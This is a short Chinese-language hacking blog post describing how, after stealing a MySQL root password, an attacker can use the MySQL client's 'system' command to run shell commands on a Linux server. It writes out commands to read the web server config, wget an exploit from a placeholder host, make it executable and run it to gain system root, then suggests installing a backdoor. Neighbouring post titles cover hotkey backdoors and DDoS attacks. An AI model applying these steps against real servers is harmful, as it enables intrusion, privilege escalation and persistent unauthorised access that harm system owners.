刚才在卫生间蹲着时候突然想到这个问题mysql5.x for linux下面有个可以帮助我们干很多事情这个4x下面貌似没原来直没发现也没去查手册就我自己经验来写点东西4,x明天再看看手册再装个实验下
 
mysql 5.x里面引入了个system这个可以执行系统命令当mysql以root登陆时候就可以利用这个执行命令当然是在权限许可范围内

般我们按照常规思路搞到mysqlroot密码的后我们都会连接上去创建个表然后outfile搞到个webshell ,然后提权如此这般今天我们换种方式

按照上面思路方法我们需要知道web绝对路径当然这个很不好找有些有sqlinjection可能报错会显示出来有就不定了但是按照我思路方法没有必要再去找web路径了直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;

直接这样就可以找到web路径当然我们目并不是找web路径放webshell进去我们是要来做其他事情比如下载exp执行搞到root权限然后装后门虾米

mysql>system wgethttp://xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

这样mysqlroot此时就成为systemroot了剩下事情如果开了ssh,就ssh上去输入mysql用户密码ok,搞定

或者直接提权的后下载后门安装这个就留给大家去研究了

上篇文章: 利用系统默认热键做后门

下篇文章: Linux操作系统中实现DDOS攻击思路方法